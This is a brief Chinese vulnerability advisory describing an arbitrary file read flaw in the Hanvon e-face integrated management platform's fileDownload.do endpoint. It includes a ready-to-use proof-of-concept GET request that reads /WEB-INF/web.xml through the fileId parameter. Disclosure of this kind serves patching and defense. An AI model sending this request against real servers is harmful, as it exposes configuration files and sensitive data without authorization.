汉王e脸通综合管理平台 fileDownload.do 任意文件读取漏洞

日期: 2025-06-16 | 影响软件: 汉王e脸通综合管理平台 | POC: 已公开

漏洞描述

汉王e脸通综合管理平台 fileDownload.do 存在任意文件读取漏洞,攻击者可以根据该漏洞获取大量敏感信息。

PoC代码

GET /manage/personnel/fileDownload.do?fileId=/WEB-INF/web.xml&recoToken=ZuZBOrvLG8M HTTP/1.1

相关漏洞推荐